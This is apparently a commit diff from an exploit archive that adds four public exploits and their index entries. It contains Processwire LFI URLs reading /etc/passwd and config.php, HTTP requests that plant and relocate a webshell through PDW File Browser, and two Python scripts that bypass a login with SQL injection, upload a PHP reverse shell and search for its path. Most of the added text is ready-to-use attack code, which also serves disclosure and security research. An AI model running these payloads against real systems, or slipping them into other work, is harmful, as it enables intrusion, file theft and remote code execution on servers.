DB: 2020-11-05

5 changes to exploits/shellcodes Processwire CMS 2.4.0 - 'download' Local File Inclusion PDW File Browser 1.3 - Remote Code Execution School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution
2020-11-05 05:01:59 +00:00 · 2020-11-05 05:01:59 +00:00 · 543f8dc781
commit 543f8dc781
parent 302d11bcbf
6 changed files with 177 additions and 0 deletions
--- a/exploits/php/webapps/48986.txt
+++ b/exploits/php/webapps/48986.txt
@ -0,0 +1,20 @@
+# Exploit Title: [Local File Inclusion Processwire CMS 2.4.0]
+# Vulnerability Type: Unauthenticated LFI
+# Date: [03.11.2020]
+# Exploit Author: [Y1LD1R1M]
+# Type: [WEBAPPS]
+# Platform: [PHP]
+# Vendor Homepage: [https://processwire.com/]
+# Version: [2.4.0]
+# Tested on: [Kali Linux]
+
+
+** Description **
+
+Local File Inclusion in Processwire CMS 2.4.0 allows to retrieve arbitrary files via the download parameter to index.php By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.
+
+** Proof of Concept **
+
+http://URL/index.php?download=/etc/passwd
+
+http://URL/index.php?download=../config.php
--- a/exploits/php/webapps/48987.txt
+++ b/exploits/php/webapps/48987.txt
@ -0,0 +1,46 @@
+# Exploit Title: PDW File Browser 1.3 - Remote Code Execution
+# Date: 24-10-2020
+# Exploit Author: David Bimmel
+# Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen
+# Vendor Homepage: n/a
+# Software Link: https://github.com/GuidoNeele/PDW-File-Browser
+# Version: <=1.3
+
+Attack type
+Remote
+
+Impact
+Remote Code Execution
+
+The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a critical software vulnerability which results in remote code execution on the web server. This vulnerability can be exploited by all authenticated users.
+
+
+Steps to RCE:
+
+Upload a .txt file containing your webshell code using the default file upload functionality within the PDF file Browser. Please note that all users (including unauthenticated users) are able to access your webshell later on. For security purposes I would recommend using weevely (https://github.com/epinna/weevely3) as this obfuscated and password protects your webshell. Below I have provided how the request should look like for uploading your WEBSHELL.txt file.
+
+
+POST /ckeditor/plugins/pdw_file_browser/ajax_php_uploader.php?uploadpath=%2Fmedia%2F&qqfile=WEBSHELL.txt HTTP/1.1
+Host: <HOSTNAME>
+[…]
+<?php
+<WEBSHELLCODE HERE>
+?>
+
+
+Once you have uploaded your webshell with a .txt extension (WEBSHELL.txt) you are able to rename the file using the rename functionality of the PDW File Browser. 
+Within this functionality it is possible to both change the file extension your WEBSHELL from .txt to .php and move the file to an arbitrary location on the web server . The path to the arbitrary location should contain double encoded characters. 
+
+Below I have provided an example which both renames our WEBSHELL.txt to WEBSHELL.php and relocates the file to the 'content' directory.
+
+
+POST /ckeditor/plugins/pdw_file_browser/actions.php HTTP/1.1
+Host: <HOSTNAME>
+[…]
+action=rename&new_filename=%252E%252E%252Fcontent%252FWEBSHELL.php&old_filename=WEBSHELL.txt&folder=%252Fmedia%252F&type=file
+
+
+After this request your webshell should be located at ‘https://<TARGET>/content/WEBSHELL.php’
+
+
+Happy Hacking :^)
--- a/exploits/php/webapps/48988.py
+++ b/exploits/php/webapps/48988.py
@ -0,0 +1,53 @@
+# Exploit Title: School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution
+# Date: 4-11-2020
+# Exploit Author: mosaaed
+# Vendor Homepage: https://www.sourcecodester.com/php/14562/school-log-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip
+# Version: 1.0
+# Tested on: Parrot 5.5.17 + Apache 2.4.46
+
+# replace shell.php with your own php reverse shell
+# change [TARGET URL] to target URL or IP address
+# setup your netcat listener for sum good ol shellz
+
+
+
+#!/usr/bin/python3
+
+import requests
+import time
+
+def sqli_admin():
+        s = requests.Session()
+        data = {"username":"admin'or'1'=1#","password":"hacked"}
+        adminlogin = "http://localhost/slms/admin/ajax.php?action=save_settings"
+        s.post(adminlogin,data=data)
+        return s
+
+def trigger_rce(session):
+        starttime = int(time.time())
+        multipart_form_data = {
+        "name": ("cyberscurity"),
+        "email": ("test@test.com"),
+        "contact" : ("+11111111111"),
+        "about" : ("Nothing much about it"),
+        "img" : ("shell.php", open("shell.php", "rb"))
+        }
+        session.post("http://localhost/slms/admin/ajax.php?action=save_settings", files=multipart_form_data)
+        get_shell(starttime-100,starttime+100,session)
+
+
+def get_shell(start,end,session):
+        for i in range(start,end):
+                 session.get("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")
+                 response = requests.get ("http://localhost/slms/admin/assets/uploads/"+ str(i) +"_shell.php")
+                 if response.status_code == 200:
+                            print("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")
+                        
+
+def main():
+        session = sqli_admin()
+        trigger_rce(session)
+
+if __name__ == '__main__':
+        main()
--- a/exploits/php/webapps/48989.py
+++ b/exploits/php/webapps/48989.py
@ -0,0 +1,53 @@
+# Exploit Title: Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution
+# Date: 4-11-2020
+# Exploit Author: mosaaed
+# Vendor Homepage: https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip
+# Version: 1.0
+# Tested on: Parrot 5.5.17 + Apache 2.4.46
+
+# replace shell.php with your own php reverse shell
+# change [TARGET URL] to target URL or IP address
+# setup your netcat listener for sum good ol shellz
+
+
+
+#!/usr/bin/python3
+
+import requests
+import time
+
+def sqli_admin():
+        s = requests.Session()
+        data = {"username":"admin'or'1'=1#","password":"mosaaed"}
+        adminlogin = "http://localhost/sta/ajax.php?action=save_settings"
+        s.post(adminlogin,data=data)
+        return s
+
+def trigger_rce(session):
+        starttime = int(time.time())
+        multipart_form_data = {
+        "name": ("cyberscurity"),
+        "email": ("test@test.com"),
+        "contact" : ("+11111111111"),
+        "about" : ("attack"),
+        "img" : ("shell.php", open("shell.php", "rb"))
+        }
+        session.post("http://localhost/sta/ajax.php?action=save_settings", files=multipart_form_data)
+        get_shell(starttime-100,starttime+100,session)
+
+
+def get_shell(start,end,session):
+        for i in range(start,end):
+                 session.get("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php")
+                 response = requests.get ("http://localhost/sta/assets/uploads/"+ str(i) +"_shell.php")
+                 if response.status_code == 200:
+                            print("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php")
+                        
+
+def main():
+        session = sqli_admin()
+        trigger_rce(session)
+
+if __name__ == '__main__':
+        main()
--- a/exploits/windows/local/48982.pdf
+++ b/exploits/windows/local/48982.pdf
@ -2,6 +2,7 @@
 # Exploit Author: Nassim Asrir
 # Vendor Homepage: https://www.foxitsoftware.com/
 # Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker to execute local files on the file system and bypass the security dialog.
+# CVE-2020-14425

 The exploit process need the user-interaction (Opening the PDF) .

--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -40804,6 +40804,10 @@ id,file,description,date,author,type,platform,port
 48981,exploits/php/webapps/48981.py,"Monitorr 1.7.6m - Authorization Bypass",2020-11-02,"Lyhin\'s Lab",webapps,php,
 48984,exploits/php/webapps/48984.txt,"Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection",2020-11-03,yunaranyancat,webapps,php,
 48985,exploits/php/webapps/48985.txt,"Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-03,Mosaaed,webapps,php,
+48986,exploits/php/webapps/48986.txt,"Processwire CMS 2.4.0 - 'download' Local File Inclusion",2020-11-04,Y1LD1R1M,webapps,php,
+48987,exploits/php/webapps/48987.txt,"PDW File Browser 1.3 - Remote Code Execution",2020-11-04,"David Bimmel",webapps,php,
+48988,exploits/php/webapps/48988.py,"School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
+48989,exploits/php/webapps/48989.py,"Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,